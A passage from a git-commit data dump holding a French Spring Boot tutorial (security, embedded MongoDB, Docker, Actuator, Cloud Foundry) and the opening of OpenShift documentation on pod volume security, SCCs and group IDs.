:\n\n[source,java]\n----\n@Component\n@Profile(\"test\")\npublic class MongoDBEmbed {\n\n private MongodExecutable mongodExecutable;\n\n @PostConstruct\n public void start() {\n MongodStarter starter = MongodStarter.getDefaultInstance();\n\n try {\n IMongodConfig mongodConfig = new MongodConfigBuilder()\n .version(Version.Main.PRODUCTION)\n .net(new Net(27017,false))\n .build();\n mongodExecutable = starter.prepare(mongodConfig);\n mongodExecutable.start();\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n @PreDestroy\n public void stop() {\n if (mongodExecutable != null) {\n mongodExecutable.stop();\n }\n }\n\n}\n----\n\t\n[start=2]\n. Nous mettons \u00e0 jour notre service REST en injectant une factory MongoDB et en sauvegardant l'ensemble des r\u00e9ponses API. Nous en profitons \u00e9galement pour ajouter une nouvelle op\u00e9ration renvoyant l'ensemble des logs pour tester la sauvegarde :\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n @Autowired\n private MongoDbFactory mongo;\n\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n String status = \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n\n DBObject dbObject = (DBObject) JSON.parse(status);\n mongo.getDb().getCollection(\"logs\").insert(dbObject);\n\n return status;\n }\n\n @RequestMapping(value = \"logs\", method = RequestMethod.GET)\n public\n @ResponseBody\n String logs() {\n DBCursor cursor = mongo.getDb().getCollection(\"logs\").find();\n\n StringBuilder sb = new StringBuilder();\n while (cursor.hasNext()) {\n sb.append(cursor.next());\n }\n\n return sb.toString();\n }\n\n}\n----\n\n[start=3]\n. Il n'y a plus qu'\u00e0 tester :\n\n[source,bash]\n----\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759655293\"}\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759658078\"}\n~$curl -k https:\/\/user:password@localhost:9292\/api\/logs\n{ \"_id\" : { \"$oid\" : \"55662d67e026541721386250\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759655293\"}{ \"_id\" : { \"$oid\" : \"55662d6ae026541721386251\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759658078\"}\n----\n\n8 - Spring Boot et Docker...tout simple (\u00e9videmment)\n====================================================\n\nOn l'a vu plus t\u00f4t, la m\u00e9thode privil\u00e9gi\u00e9e de d\u00e9ploiement consiste en un jar ex\u00e9cutable. Cela nous simplifie \u00e9galement la t\u00e2che pour \"dockeriser\" notre application. Le DockerFile correspondant est tout simple (oui encore !) :\n\n[source,dockerfile]\n----\nFROM java:8u45\nMAINTAINER Gregory Le Bonniec \"gregory.le.bonniec@ellixo.com\"\n\nADD springboot-1.0-SNAPSHOT.jar app.jar\n\nENTRYPOINT [ \"java\", \"-Dspring.profiles.active=test\", \"-jar\", \"\/app.jar\" ]\n----\n\nExplications : Le jar est ajout\u00e9 au DockerFile puis ex\u00e9cut\u00e9 en positionnant le profil de test comme le profil actif.\n\nEnfin il nous reste \u00e0 construire l'image puis \u00e0 l'ex\u00e9cuter (et \u00e0 tester) :\n\n[source,bash]\n----\n~$ docker build -t ellixo\/springboot .\n~$ docker run -d -p=9292:9292 ellixo\/springboot\n----\n\n9 - Vous pouvez m\u00eame le mettre en production\n============================================\n\nOn l'a vu dans les pr\u00e9c\u00e9dents points, SpringBoot simplifie grandement la mise en production de votre application : s\u00e9curit\u00e9, \"dockerisation\", d\u00e9ploiement ... \n\nPour aller plus loin, il est possible d'installer le module Actuator qui fournit de nombreuses fonctionnalit\u00e9s d'administation syst\u00e8me (via notamment une API Rest) :\n\n* health : fournit des donn\u00e9es permettant de v\u00e9rifier l'\u00e9tat de l'application (UP\/DOWN, \u00e9tat disque, \u00e9tat syst\u00e8mes externes ...)\n* metrics : fournit des m\u00e9triques processus (threads, CPU, m\u00e9moire ...)\n* trace : fournit les informations des derni\u00e8res connexions HTTP applicatives ...\n\nLibre \u00e0 vous ensuite de connecter ce module \u00e0 l'outil de monitoring du syst\u00e8me d'information (Graphite, Promotheus ...)\n\n[source,bash]\nExemple : API Health\n----\n~$ curl http:\/\/user:password@localhost:9292\/health\n{\"status\":\"UP\",\"diskSpace\":{\"status\":\"UP\",\"free\":169718296576,\"threshold\":10485760},\"mongo\":{\"status\":\"UP\",\"version\":\"3.0.2\"}}\n----\n\n10 - Mon client veut du Cloud...pas de soucis\n=============================================\n\nEncore une fois, le fait qu'une application Spring Boot embarque son propre containeur (Tomcat ou Jetty par d\u00e9faut donc) simplifie un d\u00e9ploiement cloud.\n\nPour d\u00e9montrer le rapidit\u00e9 du processus, j'ai d\u00e9cid\u00e9 d'exposer le d\u00e9ploiement sous la plateforme Cloud Foundry de Pivotal (\u00e0 tout seigneur, tout honneur) :\n\n* Une fois votre compte Pivotal Web Services cr\u00e9\u00e9 et le client associ\u00e9 install\u00e9, la seule commande \u00e0 ex\u00e9cuter sur votre environnement est :\n\n[source,bash]\n----\n~$ cf push springboot-demo -p springboot-1.0-SNAPSHOT.jar\n...\nUploading app files from: springboot-1.0-SNAPSHOT.jar\nUploading 623.8K, 96 files\nDone uploading\nOK\n----\n\t\n* Par d\u00e9faut, Cloud Foundry prend en compte le profil \"cloud\" ; pour autant, il est possible d'activer un autre profil en positionnant la variable d'environnement JAVA_OPTS (exemple : -Dspring.profiles.active=test)\n\n* L'application est alors disponible via l'URL _nom_app.cfapps.io_ (\\http:\/\/springboot-demo.cfapps.io ici)\n\n====\nLes sources des exemples sont disponibles sur le https:\/\/github.com\/Ellixo\/springboot-demo[Repository GitHub Ellixo]\n====","old_contents":"= 10 raisons de se mettre \u00e0 Spring Boot (2\u00e8me partie)\n:hp-tags: Spring Boot, MongoDB, Cloud Foundry\n\n====\nLa premi\u00e8re partie de cet article est disponible http:\/\/blog.ellixo.com\/2015\/06\/08\/10-raisons-de-se-mettre-a-Spring-Boot-1ere-partie.html[ici]\n====\n\n6 - La s\u00e9curit\u00e9 pour les nuls\n=============================\n\nLa mise en oeuvre de m\u00e9canisme de s\u00e9curit\u00e9 est primordial ; pour autant, il s'agit toujours d'une \u00e9tape fastidieuse que l'on a tendance \u00e0 repousser. Spring Boot (encore une fois) nous simplifie la t\u00e2che. \n\nPrenons la mise en oeuvre d'une politique de s\u00e9curit\u00e9 simple et classique mais relativement performante : Authentication Basic + HTTPS.\n\n- 1\u00e8re \u00e9tape : HTTP Basic authentication\n\nCe mode d'authentification n\u00e9cessite de fournir lors de l'appel d'une URL un nom d'utilisateur accompagn\u00e9 de son mot de passe. Dans Spring Boot, pour mettre en oeuvre ce m\u00e9canisme, il suffit de :\n\n[circle]\n* ajouter la d\u00e9pendance _org.springframework.boot.spring-boot-starter-security_ au fichier POM\n* ajouter la propri\u00e9t\u00e9 security.user.password sp\u00e9cifiant le mot de passe de l'utilisateur par d\u00e9faut (ie. _user_)\n\nD\u00e8s lors, tout appel aux URL de l'application n\u00e9cessite une authentification :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:9292\/api\n{\"timestamp\":1432745548802,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Full authentication is required to access this resource\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:bad_password@localhost:9292\/api\n{\"timestamp\":1432745622513,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Bad credentials\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432745645639\"}\n----\n\n* 2\u00e8me \u00e9tape : HTTPS\n\nL'authentification _Basic_ poss\u00e8de un d\u00e9faut majeur : elle n\u00e9cessite de faire transiter le mot de passe en clair. Pallions cela en cryptant les communications via HTTPS. Encore une fois, Spring Boot a tout pr\u00e9vu :\n\n[circle]\n* Ajout d'un repository de certificats (ie. fichier https:\/\/docs.oracle.com\/cd\/E19509-01\/820-3503\/ggfen\/index.html[.jks]) dans l'arborescence de l'application\n* Configuration des propri\u00e9t\u00e9s du repository\n\n[source,yaml]\n----\nserver:\n port: 9292\n ssl:\n key-store: classpath:keystore.jks\n key-store-password: password\n key-password: password\nsecurity:\n user:\n password: password\n----\n\nHTTPS est maintenant disponible ; voil\u00e0 votre application s\u00e9curis\u00e9e en 5 minutes.\n\n7 - La bo\u00eete \u00e0 outils du parfait petit int\u00e9grateur\n==================================================\n\nLes d\u00e9mos ou tutoriaux que vous pourrez trouver sur le web fournissent la plupart du temps une API REST simple (cf. point 1). Bien s\u00fbr, Spring Boot va beaucoup plus loin en fournissant de nombreux connecteurs :\n\n* Bases relationnelles : JDBC, JPA, JdbcTemplate\n* Bases NoSQL : Redis, MongoDB, ElasticSearch ...\n* Messaging : JMS\n\nIl est bien s\u00fbr possible d'int\u00e9grer n'importe quelle librairie externe mais les connecteurs \"Spring Boot\" simplifieront la mise en oeuvre et la configuration des syst\u00e8mes au sein de l'application.\n\nNous allons faire \u00e9voluer notre application pour stocker les logs dans une base MongoDB.\n\n. Pour \u00e9viter d'installer MongoDB et simplifier les tests de l'application, nous allons utiliser une instance embarqu\u00e9e \u00e0 l'aide de la librairie https:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Mongo Embed Flapdoodle] (remarque : nous associons cette base embarqu\u00e9e au profil \"test\" pour \u00e9viter son ex\u00e9cution sur un autre profil, production par exemple) :\n\n[source,java]\n----\n@Component\n@Profile(\"test\")\npublic class MongoDBEmbed {\n\n private MongodExecutable mongodExecutable;\n\n @PostConstruct\n public void start() {\n MongodStarter starter = MongodStarter.getDefaultInstance();\n\n try {\n IMongodConfig mongodConfig = new MongodConfigBuilder()\n .version(Version.Main.PRODUCTION)\n .net(new Net(27017,false))\n .build();\n mongodExecutable = starter.prepare(mongodConfig);\n mongodExecutable.start();\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n @PreDestroy\n public void stop() {\n if (mongodExecutable != null) {\n mongodExecutable.stop();\n }\n }\n\n}\n----\n\t\n[start=2]\n. Nous mettons \u00e0 jour notre service REST en injectant une factory MongoDB et en sauvegardant l'ensemble des r\u00e9ponses API. Nous en profitons \u00e9galement pour ajouter une nouvelle op\u00e9ration renvoyant l'ensemble des logs pour tester la sauvegarde :\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n @Autowired\n private MongoDbFactory mongo;\n\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n String status = \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n\n DBObject dbObject = (DBObject) JSON.parse(status);\n mongo.getDb().getCollection(\"logs\").insert(dbObject);\n\n return status;\n }\n\n @RequestMapping(value = \"logs\", method = RequestMethod.GET)\n public\n @ResponseBody\n String logs() {\n DBCursor cursor = mongo.getDb().getCollection(\"logs\").find();\n\n StringBuilder sb = new StringBuilder();\n while (cursor.hasNext()) {\n sb.append(cursor.next());\n }\n\n return sb.toString();\n }\n\n}\n----\n\n[start=3]\n. Il n'y a plus qu'\u00e0 tester :\n\n[source,bash]\n----\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759655293\"}\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759658078\"}\n~$curl -k https:\/\/user:password@localhost:9292\/api\/logs\n{ \"_id\" : { \"$oid\" : \"55662d67e026541721386250\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759655293\"}{ \"_id\" : { \"$oid\" : \"55662d6ae026541721386251\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759658078\"}\n----\n\n8 - Spring Boot et Docker...tout simple (\u00e9videmment)\n====================================================\n\nOn l'a vu plus t\u00f4t, la m\u00e9thode privil\u00e9gi\u00e9e de d\u00e9ploiement consiste en un jar ex\u00e9cutable. Cela nous simplifie \u00e9galement la t\u00e2che pour \"dockeriser\" notre application. Le DockerFile correspondant est tout simple (oui encore !) :\n\n[source,dockerfile]\n----\nFROM java:8u45\nMAINTAINER Gregory Le Bonniec \"gregory.le.bonniec@ellixo.com\"\n\nADD springboot-1.0-SNAPSHOT.jar app.jar\n\nENTRYPOINT [ \"java\", \"-Dspring.profiles.active=test\", \"-jar\", \"\/app.jar\" ]\n----\n\nExplications : Le jar est ajout\u00e9 au DockerFile puis ex\u00e9cut\u00e9 en positionnant le profil de test comme le profil actif.\n\nEnfin il nous reste \u00e0 construire l'image puis \u00e0 l'ex\u00e9cuter (et \u00e0 tester) :\n\n[source,bash]\n----\n~$ docker build -t ellixo\/springboot .\n~$ docker run -d -p=9292:9292 ellixo\/springboot\n----\n\n9 - Vous pouvez m\u00eame le mettre en production\n============================================\n\nOn l'a vu dans les pr\u00e9c\u00e9dents points, SpringBoot simplifie grandement la mise en production de votre application : s\u00e9curit\u00e9, \"dockerisation\", d\u00e9ploiement ... \n\nPour aller plus loin, il est possible d'installer le module Actuator qui fournit de nombreuses fonctionnalit\u00e9s d'administation syst\u00e8me (via notamment une API Rest) :\n\n* health : fournit des donn\u00e9es permettant de v\u00e9rifier l'\u00e9tat de l'application (UP\/DOWN, \u00e9tat disque, \u00e9tat syst\u00e8mes externes ...)\n* metrics : fournit des m\u00e9triques processus (threads, CPU, m\u00e9moire ...)\n* trace : fournit les informations des derni\u00e8res connexions HTTP applicatives ...\n\nLibre \u00e0 vous ensuite de connecter ce module \u00e0 l'outil de monitoring du syst\u00e8me d'information (Graphite, Promotheus ...)\n\n[source,bash]\nExemple : API Health\n----\n~$ curl http:\/\/user:password@localhost:9292\/health\n{\"status\":\"UP\",\"diskSpace\":{\"status\":\"UP\",\"free\":169718296576,\"threshold\":10485760},\"mongo\":{\"status\":\"UP\",\"version\":\"3.0.2\"}}\n----\n\n10 - Mon client veut du Cloud...pas de soucis\n=============================================\n\nEncore une fois, le fait qu'une application Spring Boot embarque son propre containeur (Tomcat ou Jetty par d\u00e9faut donc) simplifie un d\u00e9ploiement cloud.\n\nPour d\u00e9montrer le rapidit\u00e9 du processus, j'ai d\u00e9cid\u00e9 d'exposer le d\u00e9ploiement sous la plateforme Cloud Foundry de Pivotal (\u00e0 tout seigneur, tout honneur) :\n\n* Une fois votre compte Pivotal Web Services cr\u00e9\u00e9 et le client associ\u00e9 install\u00e9, la seule commande \u00e0 ex\u00e9cuter sur votre environnement est :\n\n[source,bash]\n----\n~$ cf push springboot-demo -p springboot-1.0-SNAPSHOT.jar\n...\nUploading app files from: springboot-1.0-SNAPSHOT.jar\nUploading 623.8K, 96 files\nDone uploading\nOK\n----\n\t\n* Par d\u00e9faut, Cloud Foundry prend en compte le profil \"cloud\" ; pour autant, il est possible d'activer un autre profil en positionnant la variable d'environnement JAVA_OPTS (exemple : -Dspring.profiles.active=test)\n\n* L'application est alors disponible via l'URL _nom_app.cfapps.io_ (\\http:\/\/springboot-demo.cfapps.io ici)\n\n====\nLes sources des exemples sont disponibles sur le https:\/\/github.com\/Ellixo\/springboot-demo[Repository GitHub Ellixo]\n====","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"209be6d28ec79a35599c76763451ef2ad0bb78e5","subject":"remove nfsnobody from examples and text","message":"remove nfsnobody from examples and text\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/pod_security_context.adoc","new_file":"install_config\/persistent_storage\/pod_security_context.adoc","new_contents":"[[install-config-persistent-storage-pod-security-context]]\n= Volume Security\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nThis topic provides a general guide on pod security as it relates to volume\nsecurity. For information on pod-level security in general, see\nxref:..\/..\/admin_guide\/manage_scc.adoc#admin-guide-manage-scc[Managing Security Context Constraints\n(SCC)] and the\nxref:..\/..\/architecture\/additional_concepts\/authorization.adoc#security-context-constraints[Security\nContext Constraint] concept topic. For information on the {product-title}\npersistent volume (PV) framework in general, see the\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[Persistent Storage]\nconcept topic.\n\nAccessing persistent storage requires coordination between the cluster and\/or\nstorage administrator and the end developer. The cluster administrator creates\nPVs, which abstract the underlying physical storage. The developer creates pods\nand, optionally, PVCs, which bind to PVs, based on matching criteria, such as\ncapacity.\n\nMultiple persistent volume claims (PVCs) within the same project can bind to the\nsame PV. However, once a PVC binds to a PV, that PV cannot be bound by a claim\noutside of the first claim's project. If the underlying storage needs to be\naccessed by multiple projects, then each project needs its own PV, which can\npoint to the same physical storage. In this sense, a bound PV is tied to a\nproject. For a detailed PV and PVC example, see the guide for\nhttps:\/\/github.com\/openshift\/origin\/tree\/master\/examples\/wordpress[WordPress and\nMySQL using NFS].\n\nFor the cluster administrator, granting pods access to PVs involves:\n\n- knowing the group ID and\/or user ID assigned to the actual storage,\n- understanding SELinux considerations, and\n- ensuring that these IDs are allowed in the range of legal IDs defined for the\nproject and\/or the SCC that matches the requirements of the pod.\n\nGroup IDs, the user ID, and SELinux values are defined in the\n`*SecurityContext*` section in a pod definition. Group IDs are global to the pod\nand apply to all containers defined in the pod. User IDs can also be global, or\nspecific to each container. Four sections control access to volumes:\n\n- xref:supplemental-groups[`*supplementalGroups*`]\n- xref:fsgroup[`*fsGroup*`]\n- xref:user-id[`*runAsUser*`]\n- xref:selinuxoptions[`*seLinuxOptions*`]\n\n[[sccs-defaults-allowed-ranges]]\n== SCCs, Defaults, and Allowed Ranges\n\nSCCs influence whether or not a pod is given a default user ID, `*fsGroup*` ID,\nsupplemental group ID, and SELinux label. They also influence whether or not IDs\nsupplied in the pod definition (or in the image) will be validated against a\nrange of allowable IDs. If validation is required and fails, then the pod will\nalso fail.\n\nSCCs define strategies, such as `*runAsUser*`, `*supplementalGroups*`, and\n`*fsGroup*`. These strategies help decide whether the pod is authorized.\nStrategy values set to *RunAsAny* are essentially stating that the pod can do\nwhat it wants regarding that strategy. Authorization is skipped for that\nstrategy and no {product-title} default is produced based on that strategy.\nTherefore, IDs and SELinux labels in the resulting container are based on\ncontainer defaults instead of {product-title} policies.\n\nFor a quick summary of *RunAsAny*:\n\n- Any ID defined in the pod definition (or image) is allowed.\n- Absence of an ID in the pod definition (and in the image) results in the\ncontainer assigning an ID, which is *root* (0) for Docker.\n- No SELinux labels are defined, so Docker will assign a unique label.\n\nFor these reasons, SCCs with *RunAsAny* for ID-related strategies should be\nprotected so that ordinary developers do not have access to the SCC. On the\nother hand, SCC strategies set to *MustRunAs* or *MustRunAsRange* trigger ID\nvalidation (for ID-related strategies), and cause default values to be supplied\nby {product-title} to the container when those values are not supplied directly\nin the pod definition or image.\n\nSCCs may define the range of allowed IDs (user or groups). If range checking is\nrequired (for example, using *MustRunAs*) and the allowable range is not defined\nin the SCC, then the project determines the ID range. Therefore, projects\nsupport ranges of allowable ID. However, unlike SCCs, projects do not define\nstrategies, such as `*runAsUser*`.\n\nAllowable ranges are helpful not only because they define the boundaries for\ncontainer IDs, but also because the minimum value in the range becomes the\ndefault value for the ID in question. For example, if the SCC ID strategy value\nis *MustRunAs*, the minimum value of an ID range is *100*, and the ID is absent\nfrom the pod definition, then 100 is provided as the default for this ID.\n\nAs part of pod admission, the SCCs available to a pod are examined (roughly, in\npriority order followed by most restrictive) to best match the requests of the\npod. Setting a SCC's strategy type to *RunAsAny* is less restrictive, whereas a\ntype of *MustRunAs* is more restrictive. All of these strategies are evaluated.\nTo see which SCC was assigned to a pod, use the `oc get pod` command:\n\n====\n----\n# oc get pod <pod_name> -o yaml\n...\nmetadata:\n annotations:\n openshift.io\/scc: nfs-scc <1>\n name: nfs-pod1 <2>\n namespace: default <3>\n...\n----\n<1> Name of the SCC that the pod used (in this case, a custom SCC).\n<2> Name of the pod.\n<3> Name of the project. \"Namespace\" is interchangeable with \"project\" in\n{product-title}. See\nxref:..\/..\/architecture\/core_concepts\/projects_and_users.adoc#namespaces[Projects\nand Users] for details.\n====\n\nIt may not be immediately obvious which SCC was matched by a pod, so the command\nabove can be very useful in understanding the UID, supplemental groups, and\nSELinux relabeling in a live container.\n\nAny SCC with a strategy set to *RunAsAny* allows specific values for that\nstrategy to be defined in the pod definition (and\/or image). When this applies\nto the user ID (`*runAsUser*`) it is prudent to restrict access to the SCC to\nprevent a container from being able to run as root.\n\nBecause pods often match the *restricted* SCC, it is worth knowing the security\nthis entails. The *restricted* SCC has the following characteristics:\n\n- User IDs are constrained due to the `*runAsUser*` strategy being set to\n*MustRunAsRange*. This forces user ID validation.\n- Because a range of allowable user IDs is not defined in the SCC (see `oc export\nscc restricted` for more details), the project's\n`*openshift.io\/sa.scc.uid-range*` range will be used for range checking and for\na default ID, if needed.\n- A default user ID is produced when a user ID is not specified in the pod\ndefinition and the matching SCC's `*runAsUser*` is set to *MustRunAsRange*.\n- An SELinux label is required (`seLinuxContext` set to *MustRunAs*), which uses\nthe project's default MCS label.\n- Arbitrary supplemental group IDs are allowed because no range checking is\nrequired. This is a result of both the `*supplementalGroups*` and `*fsGroup*`\nstrategies being set to *RunAsAny*.\n- Default supplemental groups are not produced for the running pod due to\n*RunAsAny* for the two group strategies above. Therefore, if no groups are\ndefined in the pod definition (or in the image), the container(s) will have no\nsupplemental groups predefined.\n\nThe following shows the *default* project and a custom SCC (*my-custom-scc*),\nwhich summarizes the interactions of the SCC and the project:\n\n====\n----\n$ oc get project default -o yaml <1>\n...\nmetadata:\n annotations: <2>\n openshift.io\/sa.scc.mcs: s0:c1,c0 <3>\n openshift.io\/sa.scc.supplemental-groups: 1000000000\/10000 <4>\n openshift.io\/sa.scc.uid-range: 1000000000\/10000 <5>\n\n$ oc get scc my-custom-scc -o yaml\n...\nfsGroup:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\nrunAsUser:\n type: MustRunAsRange <7>\n uidRangeMin: 1000100000\n uidRangeMax: 1000100999\nseLinuxContext: <8>\n type: MustRunAs\n SELinuxOptions: <9>\n user: <selinux-user-name>\n role: ...\n type: ...\n level: ...\nsupplementalGroups:\n type: MustRunAs <6>\n ranges:\n - min: 5000\n max: 6000\n----\n<1> *default* is the name of the project.\n<2> Default values are only produced when the corresponding SCC strategy is not\n*RunAsAny*.\n<3> SELinux default when not defined in the pod definition or in the SCC.\n<4> Range of allowable group IDs. ID validation only occurs when the SCC\nstrategy is *RunAsAny*. There can be more than one range specified, separated by\ncommas. See below for xref:volsec-rangeformats[supported formats].\n<5> Same as *<4>* but for user IDs. Also, only a single range of user IDs is\nsupported.\n<6> *MustRunAs* enforces group ID range checking and provides the container's\ngroups default. Based on this SCC definition, the default is 5000 (the minimum\nID value). If the range was omitted from the SCC, then the default would be\n1000000000 (derived from the project). The other supported type, *RunAsAny*, does not\nperform range checking, thus allowing any group ID, and produces no default\ngroups.\n<7> *MustRunAsRange* enforces user ID range checking and provides a UID default.\nBased on this SCC, the default UID is 1000100000 (the minimum value). If the minimum\nand maximum range were omitted from the SCC, the default user ID would be\n1000000000 (derived from the project). *MustRunAsNonRoot* and *RunAsAny* are\nthe other supported types. The range of allowed IDs can be defined to include\nany user IDs required for the target storage.\n<8> When set to *MustRunAs*, the container is created with the SCC's SELinux\noptions, or the MCS default defined in the project. A type of *RunAsAny*\nindicates that SELinux context is not required, and, if not defined in the pod,\nis not set in the container.\n<9> The SELinux user name, role name, type, and labels can be defined here.\n====\n\n[[volsec-rangeformats]]\nTwo formats are supported for allowed ranges:\n\n1. `M\/N`, where `M` is the starting ID and `N` is the count, so the range becomes\n`M` through (and including) `M+N-1`.\n\n2. `M-N`, where `M` is again the starting ID and `N` is the ending ID. The default\ngroup ID is the starting ID in the first range, which is `1000000000` in this\nproject. If the SCC did not define a minimum group ID, then the project's\ndefault ID is applied.\n\n[[supplemental-groups]]\n== Supplemental Groups\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs (supplemental or\nxref:fsgroup[fsGroup]) to gain access to persistent storage versus using\nxref:user-id[user IDs].\n====\n\nSupplemental groups are regular Linux groups. When a process runs in Linux, it\nhas a UID, a GID, and one or more supplemental groups. These attributes can be\nset for a container's main process. The `*supplementalGroups*` IDs are typically\nused for controlling access to shared storage, such as NFS and GlusterFS,\nwhereas xref:fsgroup[fsGroup] is used for controlling access to block storage,\nsuch as Ceph RBD and iSCSI.\n\nThe {product-title} shared storage plug-ins mount volumes such that the POSIX\npermissions on the mount match the permissions on the target storage. For\nexample, if the target storage's owner ID is *1234* and its group ID is *5678*, then\nthe mount on the host node and in the container will have those same IDs.\nTherefore, the container's main process must match one or both of those IDs in\norder to access the volume.\n\n[[nfs-example]]\nFor example, consider the following NFS export.\n\nOn an {product-title} node:\n\n[NOTE]\n====\n`showmount` requires access to the ports used by `rpcbind` and `rpc.mount` on\nthe NFS server\n====\n\n====\n----\n# showmount -e <nfs-server-ip-or-hostname>\nExport list for f21-nfs.vm:\n\/opt\/nfs *\n----\n====\n\nOn the NFS server:\n\n====\n----\n# cat \/etc\/exports\n\/opt\/nfs *(rw,sync,root_squash)\n...\n\n# ls -lZ \/opt\/nfs -d\ndrwx------. 1000100001 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n----\n====\n\nThe *_\/opt\/nfs\/_* export is accessible by UID *1000100001* and the group *5555*. In\ngeneral, containers should not run as root. So, in this NFS example, containers\nwhich are not run as UID *1000100001* and are not members the group *5555* will not\nhave access to the NFS export.\n\nOften, the SCC matching the pod does not allow a specific user ID to be\nspecified, thus using supplemental groups is a more flexible way to grant\nstorage access to a pod. For example, to grant NFS access to the export above,\nthe group *5555* can be defined in the pod definition:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n volumeMounts:\n - name: nfs <1>\n mountPath: \/usr\/share\/... <2>\n securityContext: <3>\n supplementalGroups: [5555] <4>\n volumes:\n - name: nfs <5>\n nfs:\n server: <nfs_server_ip_or_host>\n path: \/opt\/nfs <6>\n----\n<1> Name of the volume mount. Must match the name in the `*volumes*` section.\n<2> NFS export path as seen in the container.\n<3> Pod global security context. Applies to all containers inside the pod. Each\ncontainer can also define its `*securityContext*`, however group IDs are global\nto the pod and cannot be defined for individual containers.\n<4> Supplemental groups, which is an array of IDs, is set to 5555. This grants\ngroup access to the export.\n<5> Name of the volume. Must match the name in the `*volumeMounts*` section.\n<6> Actual NFS export path on the NFS server.\n====\n\nAll containers in the above pod (assuming the matching SCC or project allows the\ngroup *5555*) will be members of the group *5555* and have access to the volume,\nregardless of the container's user ID. However, the assumption above is\ncritical. Sometimes, the SCC does not define a range of allowable group IDs but\ninstead requires group ID validation (a result of `*supplementalGroups*` set to *MustRunAs*).\nNote that this is *not* the case for the *_restricted_* SCC. The project will not likely\nallow a group ID of *5555*, unless the project has been customized to access\nthis NFS export. So, in this scenario, the above pod will fail because its group\nID of *5555* is not within the SCC's or the project's range of allowed group\nIDs.\n\n[[scc-supplemental-groups]]\n*Supplemental Groups and Custom SCCs*\n\nTo remedy the situation in xref:nfs-example[the previous example], a custom SCC\ncan be created such that:\n\n- a minimum and max group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is often better to create a new SCC rather than modifying a predefined SCC, or\nchanging the range of allowed IDs in the predefined projects.\n\nThe easiest way to create a new SCC is to export an existing SCC and customize\nthe YAML file to meet the requirements of the new SCC. For example:\n\n. Use the *restricted* SCC as a template for the new SCC:\n+\n----\n$ oc export scc restricted > new-scc.yaml\n----\n\n. Edit the *_new-scc.yaml_* file to your desired specifications.\n\n. Create the new SCC:\n+\n----\n$ oc create -f new-scc.yaml\n----\n\n[NOTE]\n====\nThe `oc edit scc` command can be used to modify an instantiated SCC.\n====\n\nHere is a fragment of a new SCC named *nfs-scc*:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\n...\nsupplementalGroups:\n type: MustRunAs <4>\n ranges:\n - min: 5000 <5>\n max: 6000\n...\n----\n<1> The `allow*` bools are the same as for the *restricted* SCC.\n<2> Name of the new SCC.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs and thus have a\nbetter chance of matching a new pod.\n<4> `*supplementalGroups*` is a strategy and it is set to *MustRunAs*, which means\ngroup ID checking is required.\n<5> Multiple ranges are supported. The allowed group ID range here is 5000 through\n5999, with the default supplemental group being 5000.\n====\n\nWhen the same pod shown earlier runs against this new SCC (assuming, of course,\nthe pod matches the new SCC), it will start because the group *5555*,\nsupplied in the pod definition, is now allowed by the custom SCC.\n\n[[fsgroup]]\n== fsGroup\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or `*fsGroup*`) to gain access to\npersistent storage versus using xref:user-id[user IDs].\n====\n\n`*fsGroup*` defines a pod's \"file system group\" ID, which is added to the\ncontainer's supplemental groups. The `*supplementalGroups*` ID applies to shared\nstorage, whereas the `*fsGroup*` ID is used for block storage.\n\nBlock storage, such as Ceph RBD, iSCSI, and various cloud storage, is typically\ndedicated to a single pod which has requested the block storage volume, either\ndirectly or using a PVC. Unlike shared storage, block storage is taken over by a\npod, meaning that user and group IDs supplied in the pod 